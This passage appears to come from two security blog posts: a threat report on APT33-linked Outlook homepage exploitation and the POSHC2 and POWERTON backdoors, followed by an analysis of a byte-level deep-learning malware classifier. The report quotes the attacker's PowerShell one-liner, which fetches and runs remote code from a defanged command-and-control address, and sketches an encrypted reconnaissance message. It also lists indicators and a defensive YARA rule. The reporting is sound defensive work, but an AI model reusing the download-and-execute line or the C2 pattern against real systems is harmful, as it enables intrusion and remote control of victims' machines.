The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.


Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to profile the system and determine the appropriate OS-dependent POSHC2 implant, and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1), as shown in Figure 2.


Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

  • Username and domain
  • Computer name
  • CPU details
  • Current exe PID
  • Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.
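
As a rough sketch of the message handling described above (not POSHC2's actual implementation; the key below is a placeholder, and the real key, IV handling, and message format differ), AES encryption followed by Base64 encoding of a reconnaissance string can be expressed in a few lines of PowerShell:

# Illustrative only: 32-byte placeholder key; AES-CBC with a random IV prepended to the ciphertext
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Key = [System.Text.Encoding]::UTF8.GetBytes('0123456789abcdef0123456789abcdef')
$aes.GenerateIV()
$report = "$env:USERDOMAIN\$env:USERNAME;$env:COMPUTERNAME;PID=$PID"
$bytes = [System.Text.Encoding]::UTF8.GetBytes($report)
$cipher = $aes.CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
[System.Convert]::ToBase64String([byte[]]($aes.IV + $cipher))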

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success interacting with POWERTON during this time. The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.


Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell "DownloadString" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”. During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time, and this functionality is built into the framework.

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a public discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).

Table 1 contains the operational timeline for the activity we analyzed.

DATE/TIME (UTC)       NOTE                                     INDICATOR
2017-08-15 17:06:59   APT33 – EMPIRE (Used)                    8a99624d224ab3378598b9895660c890
2017-09-15 16:49:59   APT33 – PUPYRAT (Compiled)               4b19bccc25750f49c2c1bb462509f84e
2017-11-12 20:42:43   GroupA – AUT2EXE Downloader (Compiled)   95f3bea43338addc1ad951cd2d42eb6f
2017-11-14 14:55:14   GroupA – PUPYRAT (Used)                  17587668ac577fce0b278420b8eb72ac
2018-01-09 19:15:16   APT33 – PUPYRAT (Compiled)               56f5891f065494fdbb2693cfc9bce9ae
2018-02-13 13:35:06   APT33 – PUPYRAT (Used)                   56f5891f065494fdbb2693cfc9bce9ae
2018-05-09 18:28:43   GroupB – AUT2EXE (Compiled)              46038aa5b21b940099b0db413fa62687
2018-07-02 07:57:40   APT33 – POSHC2 (Used)                    fa7790abe9ee40556fb3c5524388de0b
2018-07-16 00:33:01   GroupB – POSHC2 (Compiled)               75e680d5fddbdb989812c7ba83e7c425
2018-07-16 01:39:58   GroupB – POSHC2 (Used)                   75e680d5fddbdb989812c7ba83e7c425
2018-07-16 08:36:13   GroupB – POWERTON (Used)                 46038aa5b21b940099b0db413fa62687
2018-07-31 22:09:25   APT33 – POSHC2 (Used)                    129c296c363b6d9da0102aa03878ca7f
2018-08-06 16:27:05   GroupB – POSHC2 (Compiled)               fca0ad319bf8e63431eb468603d50eff
2018-08-07 05:10:05   GroupB – POSHC2 (Used)                   75e680d5fddbdb989812c7ba83e7c425
2018-08-29 18:14:18   APT33 – POSHC2 (Used)                    5832f708fd860c88cbdc088acecec4ea
2018-10-09 16:02:55   APT33 – POSHC2 (Used)                    8d3fe1973183e1d3b0dbec31be8ee9dd
2018-10-09 16:48:09   APT33 – POSHC2 (Used)                    48d1ed9870ed40c224e50a11bf3523f8
2018-10-11 21:29:22   GroupB – POWERTON (Used)                 8be06571e915ae3f76901d52068e3498
2018-12-13 11:00:00   GroupB – POWERTON (Identified)           99649d58c0d502b2dfada02124b1504c

Table 1: Operational Timeline

Outlook and Implications

If the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.

We will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.

Custom Backdoor: POWERTON

POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry keys. Communications with the C2 occur over TCP/HTTP(S) and leverage AES encryption for traffic to and from the C2. POWERTON is typically deployed as a later-stage backdoor and is wrapped in several layers of obfuscation.
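POWERTON itself is not publicly available, so there is no sample code to show, but the persistence locations it abuses are generic enough to audit with standard tooling. The following is a minimal, hypothetical hunting sketch in Python (Windows only) that simply enumerates auto-run Run key values referencing PowerShell for analyst review; it is purely illustrative and is not a POWERTON signature.

import winreg

# Hypothetical hunting sketch: list Run-key values whose data references
# powershell.exe so an analyst can review them. Not a POWERTON detection.
RUN_KEYS = [
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\Run"),
]

def enum_run_values():
    for hive, path in RUN_KEYS:
        try:
            key = winreg.OpenKey(hive, path)
        except OSError:
            continue
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            yield path, name, str(data)
            index += 1

for path, name, data in enum_run_values():
    if "powershell" in data.lower():
        print("[review] {}\\{}: {}".format(path, name, data))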

FireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.

Table 2 contains samples of POWERTON.

Hash of Obfuscated File (MD5) | Hash of Deobfuscated File (MD5) | Version
974b999186ff434bee3ab6d61411731f | 3871aac486ba79215f2155f32d581dc2 | V1
e2d60bb6e3e67591e13b6a8178d89736 | 2cd286711151efb61a15e2e11736d7d2 | V1
bd80fcf5e70a0677ba94b3f7c011440e | 5a66480e100d4f14e12fceb60e91371d | V1
4047e238bbcec147f8b97d849ef40ce5 | f5ac89d406e698e169ba34fea59a780e | V2
c38069d0bc79acdc28af3820c1123e53 | 4aca006b9afe85b1f11314b39ee270f7 | V2
N/A | 7f4f7e307a11f121d8659ca98bc8ba56 | V2
53ae59ed03fa5df3bf738bc0775a91d9 | 99649d58c0d502b2dfada02124b1504c | V2

Table 2: POWERTON malware samples

Adversary Methods: Email Exploitation on the Rise

Outlook and Exchange are nearly synonymous with email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose email server access to the public internet for their users, those systems become intrusion vectors. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office 365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multi-factor authentication at the FireEye Cyber Defense Summit 2018.

At FireEye, our decisions are data driven, but the data provided to us is often incomplete, and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.

An adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:

  • Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?
  • Previous compromise within your organization where credentials were compromised but not identified or reset.
  • Poor password choice or password security policies resulting in brute-forced credentials.
  • Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents intended to phish them from users.
  • Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.

Once the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 portals that are not protected with multi-factor authentication. The adversary then leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange’s legitimate features.

RULER In-The-Wild: Here, There, and Everywhere

SensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI) or via remote procedure calls (RPC), both over HTTP. As detailed in the "Managed Defense Rapid Responses" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating a connection via Web Distributed Authoring and Versioning (WebDAV) to the adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.

Even without the requisite logging from the impacted mailbox, we can assess that this activity was the result of a malicious mail rule created using the aforementioned tooling, for the following reasons:

  • Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook itself was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which the evidence did not support.
  • The transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV hosted payload.
  • The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be "locally" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.
  • The payload to be executed via an Outlook client-side mail rule must take no arguments, which is likely why a compiled Aut2Exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. Running that one-liner natively from an Outlook rule was not possible because of the no-argument limitation, hence the wrapper executable.

With that in mind, the initial infection vector is illustrated in Figure 4.


Figure 4: Initial infection vector

As both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's blog.

FireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.
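One practical way to act on this observation is to review process-ancestry telemetry for Outlook directly spawning script interpreters, and to treat any hit as potential CVE-2017-11774 abuse (and therefore potentially compromised credentials) rather than assuming a phishing attachment. The sketch below is purely illustrative: it assumes process creation events have already been exported to a CSV, and the column names (parent_image, child_image, command_line) are hypothetical rather than any specific product’s schema.

import csv

# Hypothetical triage sketch: flag cases where Outlook directly spawns a
# script interpreter. The CSV layout and column names are assumptions.
SUSPECT_CHILDREN = {"wscript.exe", "cscript.exe", "powershell.exe",
                    "cmd.exe", "mshta.exe", "rundll32.exe"}

with open("process_creation_events.csv", newline="") as handle:
    for row in csv.DictReader(handle):
        parent = row.get("parent_image", "").lower()
        child = row.get("child_image", "").lower().split("\\")[-1]
        if parent.endswith("outlook.exe") and child in SUSPECT_CHILDREN:
            print("[review]", child, "spawned by", parent, "|",
                  row.get("command_line", ""))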

Understanding this nuance further highlights the exposure to this technique when combined with password spraying, as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend that organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Office 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost’s RULER.

Microsoft Outlook Security Update | RULER Module Addressed
June 13, 2017 Security Update | RULER.RULES
September 12, 2017 Security Update | RULER.FORMS
October 10, 2017 Security Update | RULER.HOMEPAGE

Table 3: Outlook attack surface mitigations

Detecting the Techniques

FireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.

PLATFORM | SIGNATURE NAME
Endpoint Security | POWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY)
Endpoint Security | SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
Endpoint Security | MIMIKATZ (CREDENTIAL STEALER)
Endpoint Security | RULER OUTLOOK PERSISTENCE (UTILITY)
Network and Email Security | FE_Exploit_HTML_CVE201711774
Network and Email Security | FE_HackTool_Win_RULER
Network and Email Security | FE_HackTool_Linux_RULER
Network and Email Security | FE_HackTool_OSX_RULER
Network and Email Security | FE_Trojan_OLE_RULER
Network and Email Security | HackTool.RULER (Network Traffic)

Table 4: FireEye product detections

For organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:

rule Hunting_Outlook_Homepage_Shell_and_Persistence
{
    meta:
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
    strings:
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
    condition:
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)
}
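If you want to run this rule outside of a dedicated scanning platform, the yara-python bindings are one option. The snippet below is a minimal sketch that assumes the rule above has been saved to outlook_homepage.yar and that collected artifacts have been staged in a local triage directory; both paths are placeholders.

import os
import yara  # pip install yara-python

# Compile the hunting rule above (assumed saved to disk) and recursively scan
# a directory of collected artifacts for matches.
rules = yara.compile(filepath="outlook_homepage.yar")

for root, _, files in os.walk(r"C:\triage\outlook_artifacts"):
    for name in files:
        path = os.path.join(root, name)
        try:
            matches = rules.match(path)
        except yara.Error:
            continue
        if matches:
            print(path, [match.rule for match in matches])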

Acknowledgements

The authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.

What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.

Highlights

  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to capture generic properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.

Background

Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).


Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE file.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.
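The exact model is not reproduced here, so the PyTorch sketch below is only a schematic of the architecture described above: a byte embedding followed by five convolution-and-pooling stages and a small fully connected classifier over a fixed-length input. The layer sizes, kernel widths, and strides are placeholders chosen for illustration, not the values used in the deployed classifier.

import torch
import torch.nn as nn

class ByteCNN(nn.Module):
    """Schematic byte-based CNN: embedding -> 5 x (conv + pool) -> classifier."""

    def __init__(self, max_len=100 * 1024, embed_dim=8, channels=48):
        super().__init__()
        # 256 byte values plus one special padding symbol (index 256).
        self.embed = nn.Embedding(257, embed_dim, padding_idx=256)
        blocks, in_ch = [], embed_dim
        for _ in range(5):  # hierarchical feature extraction
            blocks += [nn.Conv1d(in_ch, channels, kernel_size=8, stride=2),
                       nn.ReLU(),
                       nn.MaxPool1d(2)]
            in_ch = channels
        self.features = nn.Sequential(*blocks)
        self.classify = nn.Sequential(nn.AdaptiveMaxPool1d(1), nn.Flatten(),
                                      nn.Linear(channels, 1))

    def forward(self, byte_ids):                  # byte_ids: (batch, max_len) int64
        x = self.embed(byte_ids).transpose(1, 2)  # -> (batch, embed_dim, max_len)
        x = self.features(x)                      # aggregated low/high-level features
        return torch.sigmoid(self.classify(x))    # probability the file is malware

model = ByteCNN()
scores = model(torch.randint(0, 257, (2, 100 * 1024)))  # two fake "files"
print(scores.shape)  # torch.Size([2, 1])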

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes, and examining it lets us determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS), and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition is that outliers are treated as “special” by the model, since there are no other points that can easily replace them without a significant change in upstream calculations, while points in dense clusters can be used interchangeably.
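To make that workflow concrete, here is a minimal sketch using scikit-learn’s MDS implementation and the third-party hdbscan package. The embedding matrix (one row of n values per byte, plus the padding symbol) is assumed to have been exported from the trained model; random data stands in for it here.

import numpy as np
import hdbscan                      # pip install hdbscan
from sklearn.manifold import MDS

# Stand-in for the exported (257 x n) byte embedding matrix.
embedding = np.random.rand(257, 10)

# Project the n-dimensional embedding down to two dimensions for plotting,
# while approximately preserving pairwise distances.
coords = MDS(n_components=2, random_state=0).fit_transform(embedding)

# Density-based clustering: a label of -1 marks the outlier bytes that the
# model appears to treat as "special".
labels = hdbscan.HDBSCAN(min_cluster_size=5).fit_predict(coords)

for byte_value in np.where(labels == -1)[0]:
    print("outlier byte: 0x{:02x}".format(int(byte_value)))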


Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown on the right side of Figure 2. Here, a number of intriguing trends start to appear. For one, each of the bytes in the range 0x0 to 0x6 is present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), the loop and loopne instructions (0xe2 and 0xe0), and the breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section (basically, any activation that occurs outside the valid bounds of the PE file) has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).
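As a rough illustration of how an activation location can be attributed to a PE section, or flagged as falling outside the file’s declared sections, the sketch below uses the pefile module. The activation offsets are placeholders standing in for the offsets recovered from the model’s strongest pooling activations, and the sample path is hypothetical.

import pefile

def section_for_offset(pe, offset):
    """Return the section name containing a raw file offset, or a label."""
    if pe.sections and offset < pe.sections[0].PointerToRawData:
        return "HEADER"
    for section in pe.sections:
        start = section.PointerToRawData
        end = start + section.SizeOfRawData
        if start <= offset < end:
            name = section.Name.rstrip(b"\x00").decode(errors="replace")
            return name or "NULL"
    return "UNKNOWN"  # outside the valid bounds of any declared section

pe = pefile.PE("sample.exe")                   # placeholder path
activation_offsets = [0x120, 0x4A10, 0x9C000]  # placeholder activation locations
for offset in activation_offsets:
    print(hex(offset), section_for_offset(pe, offset))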


Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.


Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts are shown in Figure 5.

